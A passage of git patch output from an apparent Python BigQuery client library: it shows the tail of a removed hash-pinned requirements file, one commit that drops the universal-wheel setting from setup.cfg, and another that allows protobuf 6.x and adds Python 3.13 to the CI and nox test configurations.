--hash=sha256:d9e9913f7bd69e093b81da4535ce27af842e7bf371cde42d1ae9e9bd382dc0e9 \ - --hash=sha256:e2806553238cd076f0a55bddab37a532b53580e699ed8e5606d0de1f856b5205 \ - --hash=sha256:ebab974b1687509e5c973b5c4b8b146683e101e102e17a86bd196ecaa4d099fc \ - 
--hash=sha256:ed767bf4ba90104c1216b68111613f0d5926fb3780660ea1198fc469af410e9d \ - --hash=sha256:f7a1fc29803712f80879b0806cb83ab24ce62fc8daf0569f2204a0cfd7f68ed4 - # via - # google-cloud-storage - # google-resumable-media -google-resumable-media==2.7.2 \ - --hash=sha256:3ce7551e9fe6d99e9a126101d2536612bb73486721951e9562fee0f90c6ababa \ - --hash=sha256:5280aed4629f2b60b847b0d42f9857fd4935c11af266744df33d8074cae92fe0 - # via google-cloud-storage -googleapis-common-protos==1.65.0 \ - --hash=sha256:2972e6c496f435b92590fd54045060867f3fe9be2c82ab148fc8885035479a63 \ - --hash=sha256:334a29d07cddc3aa01dee4988f9afd9b2916ee2ff49d6b757155dc0d197852c0 - # via google-api-core -idna==3.10 \ - --hash=sha256:12f65c9b470abda6dc35cf8e63cc574b1c52b11df2c86030af0ac09b01b13ea9 \ - --hash=sha256:946d195a0d259cbba61165e88e65941f16e9b36ea6ddb97f00452bae8b1287d3 - # via requests -importlib-metadata==8.5.0 \ - --hash=sha256:45e54197d28b7a7f1559e60b95e7c567032b602131fbd588f1497f47880aa68b \ - --hash=sha256:71522656f0abace1d072b9e5481a48f07c138e00f079c38c8f883823f9c26bd7 - # via - # -r requirements.in - # keyring - # twine -jaraco-classes==3.4.0 \ - --hash=sha256:47a024b51d0239c0dd8c8540c6c7f484be3b8fcf0b2d85c13825780d3b3f3acd \ - --hash=sha256:f662826b6bed8cace05e7ff873ce0f9283b5c924470fe664fff1c2f00f581790 - # via keyring -jaraco-context==6.0.1 \ - --hash=sha256:9bae4ea555cf0b14938dc0aee7c9f32ed303aa20a3b73e7dc80111628792d1b3 \ - --hash=sha256:f797fc481b490edb305122c9181830a3a5b76d84ef6d1aef2fb9b47ab956f9e4 - # via keyring -jaraco-functools==4.1.0 \ - --hash=sha256:70f7e0e2ae076498e212562325e805204fc092d7b4c17e0e86c959e249701a9d \ - --hash=sha256:ad159f13428bc4acbf5541ad6dec511f91573b90fba04df61dafa2a1231cf649 - # via keyring -jeepney==0.8.0 \ - --hash=sha256:5efe48d255973902f6badc3ce55e2aa6c5c3b3bc642059ef3a91247bcfcc5806 \ - --hash=sha256:c0a454ad016ca575060802ee4d590dd912e35c122fa04e70306de3d076cce755 - # via - # keyring - # secretstorage -jinja2==3.1.5 \ - 
--hash=sha256:8fefff8dc3034e27bb80d67c671eb8a9bc424c0ef4c0826edbff304cceff43bb \ - --hash=sha256:aba0f4dc9ed8013c424088f68a5c226f7d6097ed89b246d7749c2ec4175c6adb - # via gcp-releasetool -keyring==25.4.1 \ - --hash=sha256:5426f817cf7f6f007ba5ec722b1bcad95a75b27d780343772ad76b17cb47b0bf \ - --hash=sha256:b07ebc55f3e8ed86ac81dd31ef14e81ace9dd9c3d4b5d77a6e9a2016d0d71a1b - # via - # gcp-releasetool - # twine -markdown-it-py==3.0.0 \ - --hash=sha256:355216845c60bd96232cd8d8c40e8f9765cc86f46880e43a8fd22dc1a1a8cab1 \ - --hash=sha256:e3f60a94fa066dc52ec76661e37c851cb232d92f9886b15cb560aaada2df8feb - # via rich -markupsafe==3.0.1 \ - --hash=sha256:0778de17cff1acaeccc3ff30cd99a3fd5c50fc58ad3d6c0e0c4c58092b859396 \ - --hash=sha256:0f84af7e813784feb4d5e4ff7db633aba6c8ca64a833f61d8e4eade234ef0c38 \ - --hash=sha256:17b2aea42a7280db02ac644db1d634ad47dcc96faf38ab304fe26ba2680d359a \ - --hash=sha256:242d6860f1fd9191aef5fae22b51c5c19767f93fb9ead4d21924e0bcb17619d8 \ - --hash=sha256:244dbe463d5fb6d7ce161301a03a6fe744dac9072328ba9fc82289238582697b \ - --hash=sha256:26627785a54a947f6d7336ce5963569b5d75614619e75193bdb4e06e21d447ad \ - --hash=sha256:2a4b34a8d14649315c4bc26bbfa352663eb51d146e35eef231dd739d54a5430a \ - --hash=sha256:2ae99f31f47d849758a687102afdd05bd3d3ff7dbab0a8f1587981b58a76152a \ - --hash=sha256:312387403cd40699ab91d50735ea7a507b788091c416dd007eac54434aee51da \ - --hash=sha256:3341c043c37d78cc5ae6e3e305e988532b072329639007fd408a476642a89fd6 \ - --hash=sha256:33d1c36b90e570ba7785dacd1faaf091203d9942bc036118fab8110a401eb1a8 \ - --hash=sha256:3e683ee4f5d0fa2dde4db77ed8dd8a876686e3fc417655c2ece9a90576905344 \ - --hash=sha256:3ffb4a8e7d46ed96ae48805746755fadd0909fea2306f93d5d8233ba23dda12a \ - --hash=sha256:40621d60d0e58aa573b68ac5e2d6b20d44392878e0bfc159012a5787c4e35bc8 \ - --hash=sha256:40f1e10d51c92859765522cbd79c5c8989f40f0419614bcdc5015e7b6bf97fc5 \ - --hash=sha256:45d42d132cff577c92bfba536aefcfea7e26efb975bd455db4e6602f5c9f45e7 \ - 
--hash=sha256:48488d999ed50ba8d38c581d67e496f955821dc183883550a6fbc7f1aefdc170 \ - --hash=sha256:4935dd7883f1d50e2ffecca0aa33dc1946a94c8f3fdafb8df5c330e48f71b132 \ - --hash=sha256:4c2d64fdba74ad16138300815cfdc6ab2f4647e23ced81f59e940d7d4a1469d9 \ - --hash=sha256:4c8817557d0de9349109acb38b9dd570b03cc5014e8aabf1cbddc6e81005becd \ - --hash=sha256:4ffaaac913c3f7345579db4f33b0020db693f302ca5137f106060316761beea9 \ - --hash=sha256:5a4cb365cb49b750bdb60b846b0c0bc49ed62e59a76635095a179d440540c346 \ - --hash=sha256:62fada2c942702ef8952754abfc1a9f7658a4d5460fabe95ac7ec2cbe0d02abc \ - --hash=sha256:67c519635a4f64e495c50e3107d9b4075aec33634272b5db1cde839e07367589 \ - --hash=sha256:6a54c43d3ec4cf2a39f4387ad044221c66a376e58c0d0e971d47c475ba79c6b5 \ - --hash=sha256:7044312a928a66a4c2a22644147bc61a199c1709712069a344a3fb5cfcf16915 \ - --hash=sha256:730d86af59e0e43ce277bb83970530dd223bf7f2a838e086b50affa6ec5f9295 \ - --hash=sha256:800100d45176652ded796134277ecb13640c1a537cad3b8b53da45aa96330453 \ - --hash=sha256:80fcbf3add8790caddfab6764bde258b5d09aefbe9169c183f88a7410f0f6dea \ - --hash=sha256:82b5dba6eb1bcc29cc305a18a3c5365d2af06ee71b123216416f7e20d2a84e5b \ - --hash=sha256:852dc840f6d7c985603e60b5deaae1d89c56cb038b577f6b5b8c808c97580f1d \ - --hash=sha256:8ad4ad1429cd4f315f32ef263c1342166695fad76c100c5d979c45d5570ed58b \ - --hash=sha256:8ae369e84466aa70f3154ee23c1451fda10a8ee1b63923ce76667e3077f2b0c4 \ - --hash=sha256:93e8248d650e7e9d49e8251f883eed60ecbc0e8ffd6349e18550925e31bd029b \ - --hash=sha256:973a371a55ce9ed333a3a0f8e0bcfae9e0d637711534bcb11e130af2ab9334e7 \ - --hash=sha256:9ba25a71ebf05b9bb0e2ae99f8bc08a07ee8e98c612175087112656ca0f5c8bf \ - --hash=sha256:a10860e00ded1dd0a65b83e717af28845bb7bd16d8ace40fe5531491de76b79f \ - --hash=sha256:a4792d3b3a6dfafefdf8e937f14906a51bd27025a36f4b188728a73382231d91 \ - --hash=sha256:a7420ceda262dbb4b8d839a4ec63d61c261e4e77677ed7c66c99f4e7cb5030dd \ - --hash=sha256:ad91738f14eb8da0ff82f2acd0098b6257621410dcbd4df20aaa5b4233d75a50 \ - 
--hash=sha256:b6a387d61fe41cdf7ea95b38e9af11cfb1a63499af2759444b99185c4ab33f5b \ - --hash=sha256:b954093679d5750495725ea6f88409946d69cfb25ea7b4c846eef5044194f583 \ - --hash=sha256:bbde71a705f8e9e4c3e9e33db69341d040c827c7afa6789b14c6e16776074f5a \ - --hash=sha256:beeebf760a9c1f4c07ef6a53465e8cfa776ea6a2021eda0d0417ec41043fe984 \ - --hash=sha256:c91b394f7601438ff79a4b93d16be92f216adb57d813a78be4446fe0f6bc2d8c \ - --hash=sha256:c97ff7fedf56d86bae92fa0a646ce1a0ec7509a7578e1ed238731ba13aabcd1c \ - --hash=sha256:cb53e2a99df28eee3b5f4fea166020d3ef9116fdc5764bc5117486e6d1211b25 \ - --hash=sha256:cbf445eb5628981a80f54087f9acdbf84f9b7d862756110d172993b9a5ae81aa \ - --hash=sha256:d06b24c686a34c86c8c1fba923181eae6b10565e4d80bdd7bc1c8e2f11247aa4 \ - --hash=sha256:d98e66a24497637dd31ccab090b34392dddb1f2f811c4b4cd80c230205c074a3 \ - --hash=sha256:db15ce28e1e127a0013dfb8ac243a8e392db8c61eae113337536edb28bdc1f97 \ - --hash=sha256:db842712984e91707437461930e6011e60b39136c7331e971952bb30465bc1a1 \ - --hash=sha256:e24bfe89c6ac4c31792793ad9f861b8f6dc4546ac6dc8f1c9083c7c4f2b335cd \ - --hash=sha256:e81c52638315ff4ac1b533d427f50bc0afc746deb949210bc85f05d4f15fd772 \ - --hash=sha256:e9393357f19954248b00bed7c56f29a25c930593a77630c719653d51e7669c2a \ - --hash=sha256:ee3941769bd2522fe39222206f6dd97ae83c442a94c90f2b7a25d847d40f4729 \ - --hash=sha256:f31ae06f1328595d762c9a2bf29dafd8621c7d3adc130cbb46278079758779ca \ - --hash=sha256:f94190df587738280d544971500b9cafc9b950d32efcb1fba9ac10d84e6aa4e6 \ - --hash=sha256:fa7d686ed9883f3d664d39d5a8e74d3c5f63e603c2e3ff0abcba23eac6542635 \ - --hash=sha256:fb532dd9900381d2e8f48172ddc5a59db4c445a11b9fab40b3b786da40d3b56b \ - --hash=sha256:fe32482b37b4b00c7a52a07211b479653b7fe4f22b2e481b9a9b099d8a430f2f - # via jinja2 -mdurl==0.1.2 \ - --hash=sha256:84008a41e51615a49fc9966191ff91509e3c40b939176e643fd50a5c2196b8f8 \ - --hash=sha256:bb413d29f5eea38f31dd4754dd7377d4465116fb207585f97bf925588687c1ba - # via markdown-it-py -more-itertools==10.5.0 \ - 
--hash=sha256:037b0d3203ce90cca8ab1defbbdac29d5f993fc20131f3664dc8d6acfa872aef \ - --hash=sha256:5482bfef7849c25dc3c6dd53a6173ae4795da2a41a80faea6700d9f5846c5da6 - # via - # jaraco-classes - # jaraco-functools -nh3==0.2.18 \ - --hash=sha256:0411beb0589eacb6734f28d5497ca2ed379eafab8ad8c84b31bb5c34072b7164 \ - --hash=sha256:14c5a72e9fe82aea5fe3072116ad4661af5cf8e8ff8fc5ad3450f123e4925e86 \ - --hash=sha256:19aaba96e0f795bd0a6c56291495ff59364f4300d4a39b29a0abc9cb3774a84b \ - --hash=sha256:34c03fa78e328c691f982b7c03d4423bdfd7da69cd707fe572f544cf74ac23ad \ - --hash=sha256:36c95d4b70530b320b365659bb5034341316e6a9b30f0b25fa9c9eff4c27a204 \ - --hash=sha256:3a157ab149e591bb638a55c8c6bcb8cdb559c8b12c13a8affaba6cedfe51713a \ - --hash=sha256:42c64511469005058cd17cc1537578eac40ae9f7200bedcfd1fc1a05f4f8c200 \ - --hash=sha256:5f36b271dae35c465ef5e9090e1fdaba4a60a56f0bb0ba03e0932a66f28b9189 \ - --hash=sha256:6955369e4d9f48f41e3f238a9e60f9410645db7e07435e62c6a9ea6135a4907f \ - --hash=sha256:7b7c2a3c9eb1a827d42539aa64091640bd275b81e097cd1d8d82ef91ffa2e811 \ - --hash=sha256:8ce0f819d2f1933953fca255db2471ad58184a60508f03e6285e5114b6254844 \ - --hash=sha256:94a166927e53972a9698af9542ace4e38b9de50c34352b962f4d9a7d4c927af4 \ - --hash=sha256:a7f1b5b2c15866f2db413a3649a8fe4fd7b428ae58be2c0f6bca5eefd53ca2be \ - --hash=sha256:c8b3a1cebcba9b3669ed1a84cc65bf005728d2f0bc1ed2a6594a992e817f3a50 \ - --hash=sha256:de3ceed6e661954871d6cd78b410213bdcb136f79aafe22aa7182e028b8c7307 \ - --hash=sha256:f0eca9ca8628dbb4e916ae2491d72957fdd35f7a5d326b7032a345f111ac07fe - # via readme-renderer -nox==2024.10.9 \ - --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ - --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 - # via -r requirements.in -packaging==24.1 \ - --hash=sha256:026ed72c8ed3fcce5bf8950572258698927fd1dbda10a5e981cdf0ac37f4f002 \ - --hash=sha256:5b8f2217dbdbd2f7f384c41c628544e6d52f2d0f53c6d0c3ea61aa5d1d7ff124 - # via - # gcp-releasetool - # 
nox -pkginfo==1.10.0 \ - --hash=sha256:5df73835398d10db79f8eecd5cd86b1f6d29317589ea70796994d49399af6297 \ - --hash=sha256:889a6da2ed7ffc58ab5b900d888ddce90bce912f2d2de1dc1c26f4cb9fe65097 - # via twine -platformdirs==4.3.6 \ - --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ - --hash=sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb - # via virtualenv -proto-plus==1.24.0 \ - --hash=sha256:30b72a5ecafe4406b0d339db35b56c4059064e69227b8c3bda7462397f966445 \ - --hash=sha256:402576830425e5f6ce4c2a6702400ac79897dab0b4343821aa5188b0fab81a12 - # via google-api-core -protobuf==5.28.2 \ - --hash=sha256:2c69461a7fcc8e24be697624c09a839976d82ae75062b11a0972e41fd2cd9132 \ - --hash=sha256:35cfcb15f213449af7ff6198d6eb5f739c37d7e4f1c09b5d0641babf2cc0c68f \ - --hash=sha256:52235802093bd8a2811abbe8bf0ab9c5f54cca0a751fdd3f6ac2a21438bffece \ - --hash=sha256:59379674ff119717404f7454647913787034f03fe7049cbef1d74a97bb4593f0 \ - --hash=sha256:5e8a95246d581eef20471b5d5ba010d55f66740942b95ba9b872d918c459452f \ - --hash=sha256:87317e9bcda04a32f2ee82089a204d3a2f0d3c8aeed16568c7daf4756e4f1fe0 \ - --hash=sha256:8ddc60bf374785fb7cb12510b267f59067fa10087325b8e1855b898a0d81d276 \ - --hash=sha256:a8b9403fc70764b08d2f593ce44f1d2920c5077bf7d311fefec999f8c40f78b7 \ - --hash=sha256:c0ea0123dac3399a2eeb1a1443d82b7afc9ff40241433296769f7da42d142ec3 \ - --hash=sha256:ca53faf29896c526863366a52a8f4d88e69cd04ec9571ed6082fa117fac3ab36 \ - --hash=sha256:eeea10f3dc0ac7e6b4933d32db20662902b4ab81bf28df12218aa389e9c2102d - # via - # gcp-docuploader - # gcp-releasetool - # google-api-core - # googleapis-common-protos - # proto-plus -pyasn1==0.6.1 \ - --hash=sha256:0d632f46f2ba09143da3a8afe9e33fb6f92fa2320ab7e886e2d0f7672af84629 \ - --hash=sha256:6f580d2bdd84365380830acf45550f2511469f673cb4a5ae3857a3170128b034 - # via - # pyasn1-modules - # rsa -pyasn1-modules==0.4.1 \ - --hash=sha256:49bfa96b45a292b711e986f222502c1c9a5e1f4e568fc30e2574a6c7d07838fd \ - 
--hash=sha256:c28e2dbf9c06ad61c71a075c7e0f9fd0f1b0bb2d2ad4377f240d33ac2ab60a7c - # via google-auth -pycparser==2.22 \ - --hash=sha256:491c8be9c040f5390f5bf44a5b07752bd07f56edf992381b05c701439eec10f6 \ - --hash=sha256:c3702b6d3dd8c7abc1afa565d7e63d53a1d0bd86cdc24edd75470f4de499cfcc - # via cffi -pygments==2.18.0 \ - --hash=sha256:786ff802f32e91311bff3889f6e9a86e81505fe99f2735bb6d60ae0c5004f199 \ - --hash=sha256:b8e6aca0523f3ab76fee51799c488e38782ac06eafcf95e7ba832985c8e7b13a - # via - # readme-renderer - # rich -pyjwt==2.9.0 \ - --hash=sha256:3b02fb0f44517787776cf48f2ae25d8e14f300e6d7545a4315cee571a415e850 \ - --hash=sha256:7e1e5b56cc735432a7369cbfa0efe50fa113ebecdc04ae6922deba8b84582d0c - # via gcp-releasetool -pyperclip==1.9.0 \ - --hash=sha256:b7de0142ddc81bfc5c7507eea19da920b92252b548b96186caf94a5e2527d310 - # via gcp-releasetool -python-dateutil==2.9.0.post0 \ - --hash=sha256:37dd54208da7e1cd875388217d5e00ebd4179249f90fb72437e91a35459a0ad3 \ - --hash=sha256:a8b2bc7bffae282281c8140a97d3aa9c14da0b136dfe83f850eea9a5f7470427 - # via gcp-releasetool -readme-renderer==44.0 \ - --hash=sha256:2fbca89b81a08526aadf1357a8c2ae889ec05fb03f5da67f9769c9a592166151 \ - --hash=sha256:8712034eabbfa6805cacf1402b4eeb2a73028f72d1166d6f5cb7f9c047c5d1e1 - # via twine -requests==2.32.3 \ - --hash=sha256:55365417734eb18255590a9ff9eb97e9e1da868d4ccd6402399eaf68af20a760 \ - --hash=sha256:70761cfe03c773ceb22aa2f671b4757976145175cdfca038c02654d061d6dcc6 - # via - # gcp-releasetool - # google-api-core - # google-cloud-storage - # requests-toolbelt - # twine -requests-toolbelt==1.0.0 \ - --hash=sha256:7681a0a3d047012b5bdc0ee37d7f8f07ebe76ab08caeccfc3921ce23c88d5bc6 \ - --hash=sha256:cccfdd665f0a24fcf4726e690f65639d272bb0637b9b92dfd91a5568ccf6bd06 - # via twine -rfc3986==2.0.0 \ - --hash=sha256:50b1502b60e289cb37883f3dfd34532b8873c7de9f49bb546641ce9cbd256ebd \ - --hash=sha256:97aacf9dbd4bfd829baad6e6309fa6573aaf1be3f6fa735c8ab05e46cecb261c - # via twine -rich==13.9.2 \ - 
--hash=sha256:51a2c62057461aaf7152b4d611168f93a9fc73068f8ded2790f29fe2b5366d0c \ - --hash=sha256:8c82a3d3f8dcfe9e734771313e606b39d8247bb6b826e196f4914b333b743cf1 - # via twine -rsa==4.9 \ - --hash=sha256:90260d9058e514786967344d0ef75fa8727eed8a7d2e43ce9f4bcf1b536174f7 \ - --hash=sha256:e38464a49c6c85d7f1351b0126661487a7e0a14a50f1675ec50eb34d4f20ef21 - # via google-auth -secretstorage==3.3.3 \ - --hash=sha256:2403533ef369eca6d2ba81718576c5e0f564d5cca1b58f73a8b23e7d4eeebd77 \ - --hash=sha256:f356e6628222568e3af06f2eba8df495efa13b3b63081dafd4f7d9a7b7bc9f99 - # via keyring -six==1.16.0 \ - --hash=sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926 \ - --hash=sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254 - # via - # gcp-docuploader - # python-dateutil -tomli==2.0.2 \ - --hash=sha256:2ebe24485c53d303f690b0ec092806a085f07af5a5aa1464f3931eec36caaa38 \ - --hash=sha256:d46d457a85337051c36524bc5349dd91b1877838e2979ac5ced3e710ed8a60ed - # via nox -twine==5.1.1 \ - --hash=sha256:215dbe7b4b94c2c50a7315c0275d2258399280fbb7d04182c7e55e24b5f93997 \ - --hash=sha256:9aa0825139c02b3434d913545c7b847a21c835e11597f5255842d457da2322db - # via -r requirements.in -typing-extensions==4.12.2 \ - --hash=sha256:04e5ca0351e0f3f85c6853954072df659d0d13fac324d0072316b67d7794700d \ - --hash=sha256:1a7ead55c7e559dd4dee8856e3a88b41225abfe1ce8df57b7c13915fe121ffb8 - # via - # -r requirements.in - # rich -urllib3==2.2.3 \ - --hash=sha256:ca899ca043dcb1bafa3e262d73aa25c465bfb49e0bd9dd5d59f1d0acba2f8fac \ - --hash=sha256:e7d814a81dad81e6caf2ec9fdedb284ecc9c73076b62654547cc64ccdcae26e9 - # via - # requests - # twine -virtualenv==20.26.6 \ - --hash=sha256:280aede09a2a5c317e409a00102e7077c6432c5a38f0ef938e643805a7ad2c48 \ - --hash=sha256:7345cc5b25405607a624d8418154577459c3e0277f5466dd79c49d5e492995f2 - # via nox -wheel==0.44.0 \ - --hash=sha256:2376a90c98cc337d18623527a97c31797bd02bad0033d41547043a1cbfbe448f \ - 
--hash=sha256:a29c3f2817e95ab89aa4660681ad547c0e9547f20e75b0562fe7723c9a2a9d49 - # via -r requirements.in -zipp==3.20.2 \ - --hash=sha256:a817ac80d6cf4b23bf7f2828b7cabf326f15a001bea8b1f9b49631780ba28350 \ - --hash=sha256:bc9eb26f4506fda01b81bcde0ca78103b6e62f991b381fec825435c836edbc29 - # via importlib-metadata - -# The following packages are considered to be unsafe in a requirements file: -setuptools==75.1.0 \ - --hash=sha256:35ab7fd3bcd95e6b7fd704e4a1539513edad446c097797f2985e0e4b960772f2 \ - --hash=sha256:d59a21b17a275fb872a9c3dae73963160ae079f1049ed956880cd7c09b120538 - # via -r requirements.in From d7f76853d598c354bfd2e65f5dde28dae97da0ec Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Fri, 14 Mar 2025 09:36:26 -0400 Subject: [PATCH 074/202] fix: remove setup.cfg configuration for creating universal wheels (#2146) `setup.cfg` contains a setting to create a `Universal Wheel` which is only needed if libraries support both Python 2 and Python 3. This library only supports Python 3 so this setting is no longer needed. See https://packaging.python.org/en/latest/guides/distributing-packages-using-setuptools/#wheels. See similar PR https://togithub.com/googleapis/google-cloud-python/pull/13659 which includes this stack trace ``` running bdist_wheel /tmp/pip-build-env-9o_3w17v/overlay/lib/python3.13/site-packages/setuptools/_distutils/cmd.py:135: SetuptoolsDeprecationWarning: bdist_wheel.universal is deprecated !! ******************************************************************************** With Python 2.7 end-of-life, support for building universal wheels (i.e., wheels that support both Python 2 and Python 3) is being obviated. Please discontinue using this option, or if you still need it, file an issue with pypa/setuptools describing your use case. By 2025-Aug-30, you need to update your project and remove deprecated calls or your builds will no longer be supported. ******************************************************************************** !! 
``` --- setup.cfg | 4 ---- 1 file changed, 4 deletions(-) diff --git a/setup.cfg b/setup.cfg index 37b63aa49..d5e734f0f 100644 --- a/setup.cfg +++ b/setup.cfg @@ -14,10 +14,6 @@ # See the License for the specific language governing permissions and # limitations under the License. -# Generated by synthtool. DO NOT EDIT! -[bdist_wheel] -universal = 1 - [pytype] python_version = 3.8 inputs = From 0842aa10967b1d8395cfb43e52c8ea091b381870 Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Tue, 18 Mar 2025 15:30:46 -0400 Subject: [PATCH 075/202] fix: Allow protobuf 6.x (#2142) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * fix: Allow protobuf 6.x * update prerelease_deps nox session so that prerelease versions of protobuf are installed * ensure python-bigquery is installed from source * feat: add support for Python 3.13 * restore replacement * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * fix typo --------- Co-authored-by: Owl Bot --- .github/sync-repo-settings.yaml | 5 +- ...deps-3.12.cfg => prerelease-deps-3.13.cfg} | 2 +- .../{snippets-3.12.cfg => snippets-3.13.cfg} | 2 +- .../{system-3.12.cfg => system-3.13.cfg} | 4 +- .kokoro/presubmit/system-3.9.cfg | 2 +- CONTRIBUTING.rst | 7 +- noxfile.py | 78 ++++++++++--------- owlbot.py | 35 ++------- pyproject.toml | 35 +++++---- testing/constraints-3.13.txt | 0 10 files changed, 76 insertions(+), 94 deletions(-) rename .kokoro/continuous/{prerelease-deps-3.12.cfg => prerelease-deps-3.13.cfg} (77%) rename .kokoro/presubmit/{snippets-3.12.cfg => snippets-3.13.cfg} (81%) rename .kokoro/presubmit/{system-3.12.cfg => system-3.13.cfg} (81%) create mode 100644 testing/constraints-3.13.txt diff --git a/.github/sync-repo-settings.yaml b/.github/sync-repo-settings.yaml index 188c44bbd..1e61b4d65 100644 --- a/.github/sync-repo-settings.yaml +++ b/.github/sync-repo-settings.yaml @@ -10,14 +10,15 @@
branchProtectionRules: requiresStrictStatusChecks: true requiredStatusCheckContexts: - 'Kokoro' - - 'Kokoro system-3.12' - - 'Kokoro snippets-3.12' + - 'Kokoro system-3.13' + - 'Kokoro snippets-3.13' - 'cla/google' - 'Samples - Lint' - 'Samples - Python 3.9' - 'Samples - Python 3.10' - 'Samples - Python 3.11' - 'Samples - Python 3.12' + - 'Samples - Python 3.13' - pattern: v2 requiresLinearHistory: true requiresCodeOwnerReviews: true diff --git a/.kokoro/continuous/prerelease-deps-3.12.cfg b/.kokoro/continuous/prerelease-deps-3.13.cfg similarity index 77% rename from .kokoro/continuous/prerelease-deps-3.12.cfg rename to .kokoro/continuous/prerelease-deps-3.13.cfg index ece962a17..99a1e7150 100644 --- a/.kokoro/continuous/prerelease-deps-3.12.cfg +++ b/.kokoro/continuous/prerelease-deps-3.13.cfg @@ -3,5 +3,5 @@ # Only run this nox session. env_vars: { key: "NOX_SESSION" - value: "prerelease_deps-3.12" + value: "prerelease_deps-3.13" } diff --git a/.kokoro/presubmit/snippets-3.12.cfg b/.kokoro/presubmit/snippets-3.13.cfg similarity index 81% rename from .kokoro/presubmit/snippets-3.12.cfg rename to .kokoro/presubmit/snippets-3.13.cfg index 1381e8323..0b89f0863 100644 --- a/.kokoro/presubmit/snippets-3.12.cfg +++ b/.kokoro/presubmit/snippets-3.13.cfg @@ -3,5 +3,5 @@ # Only run this nox session. env_vars: { key: "NOX_SESSION" - value: "snippets-3.12" + value: "snippets-3.13" } diff --git a/.kokoro/presubmit/system-3.12.cfg b/.kokoro/presubmit/system-3.13.cfg similarity index 81% rename from .kokoro/presubmit/system-3.12.cfg rename to .kokoro/presubmit/system-3.13.cfg index 789455bd6..a0e9a0108 100644 --- a/.kokoro/presubmit/system-3.12.cfg +++ b/.kokoro/presubmit/system-3.13.cfg @@ -3,5 +3,5 @@ # Only run this nox session. 
env_vars: { key: "NOX_SESSION" - value: "system-3.12" -} + value: "system-3.13" +} \ No newline at end of file diff --git a/.kokoro/presubmit/system-3.9.cfg b/.kokoro/presubmit/system-3.9.cfg index bd1fb514b..b8ae66b37 100644 --- a/.kokoro/presubmit/system-3.9.cfg +++ b/.kokoro/presubmit/system-3.9.cfg @@ -4,4 +4,4 @@ env_vars: { key: "NOX_SESSION" value: "system-3.9" -} +} \ No newline at end of file diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst index 8f4d54bce..b2993768b 100644 --- a/CONTRIBUTING.rst +++ b/CONTRIBUTING.rst @@ -143,12 +143,13 @@ Running System Tests $ nox -s system # Run a single system test - $ nox -s system-3.9 -- -k + $ nox -s system-3.13 -- -k .. note:: - System tests are configured to run under Python 3.9, 3.11, 3.12. + System tests are only configured to run under Python 3.9 and 3.13. + For expediency, we do not run them in older versions of Python 3. This alone will not run the tests. You'll need to change some local auth settings and change some configuration in your project to @@ -238,7 +239,7 @@ Supported versions can be found in our ``noxfile.py`` `config`_. .. _config: https://github.com/googleapis/python-bigquery/blob/main/noxfile.py -We also explicitly decided to support Python 3 beginning with version 3.7. +We also explicitly decided to support Python 3 beginning with version 3.9. 
Reasons for this include: - Encouraging use of newest versions of Python 3 diff --git a/noxfile.py b/noxfile.py index f069f8d37..1b118836b 100644 --- a/noxfile.py +++ b/noxfile.py @@ -38,8 +38,8 @@ ) DEFAULT_PYTHON_VERSION = "3.9" -SYSTEM_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12"] -UNIT_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12"] +SYSTEM_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12", "3.13"] +UNIT_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12", "3.13"] CURRENT_DIRECTORY = pathlib.Path(__file__).parent.absolute() @@ -362,6 +362,40 @@ def prerelease_deps(session): https://github.com/googleapis/python-bigquery/issues/95 """ + # Because we test minimum dependency versions on the minimum Python + # version, the first version we test with in the unit tests sessions has a + # constraints file containing all dependencies and extras. + with open( + CURRENT_DIRECTORY + / "testing" + / f"constraints-{UNIT_TEST_PYTHON_VERSIONS[0]}.txt", + encoding="utf-8", + ) as constraints_file: + constraints_text = constraints_file.read() + + # Ignore leading whitespace and comment lines. + deps = [ + match.group(1) + for match in re.finditer( + r"^\s*(\S+)(?===\S+)", constraints_text, flags=re.MULTILINE + ) + ] + + session.install(*deps) + + session.install( + "--pre", + "--upgrade", + "freezegun", + "google-cloud-datacatalog", + "google-cloud-resource-manager", + "google-cloud-storage", + "google-cloud-testutils", + "psutil", + "pytest", + "pytest-cov", + ) + # PyArrow prerelease packages are published to an alternative PyPI host. # https://arrow.apache.org/docs/python/install.html#installing-nightly-packages session.install( @@ -386,48 +420,18 @@ def prerelease_deps(session): session.install( "--pre", "--upgrade", + "--no-deps", "google-api-core", "google-cloud-bigquery-storage", "google-cloud-core", "google-resumable-media", "db-dtypes", - # Exclude version 1.49.0rc1 which has a known issue. 
See https://github.com/grpc/grpc/pull/30642 - "grpcio!=1.49.0rc1", - ) - session.install( - "freezegun", - "google-cloud-datacatalog", - "google-cloud-resource-manager", - "google-cloud-storage", - "google-cloud-testutils", - "psutil", - "pytest", - "pytest-cov", + "grpcio", + "protobuf", ) - # Because we test minimum dependency versions on the minimum Python - # version, the first version we test with in the unit tests sessions has a - # constraints file containing all dependencies and extras. - with open( - CURRENT_DIRECTORY - / "testing" - / f"constraints-{UNIT_TEST_PYTHON_VERSIONS[0]}.txt", - encoding="utf-8", - ) as constraints_file: - constraints_text = constraints_file.read() - - # Ignore leading whitespace and comment lines. - deps = [ - match.group(1) - for match in re.finditer( - r"^\s*(\S+)(?===\S+)", constraints_text, flags=re.MULTILINE - ) - ] - - # We use --no-deps to ensure that pre-release versions aren't overwritten - # by the version ranges in setup.py. - session.install(*deps) - session.install("--no-deps", "-e", ".[all]") + # Ensure that this library is installed from source + session.install("-e", ".", "--no-deps") # Print out prerelease package versions. 
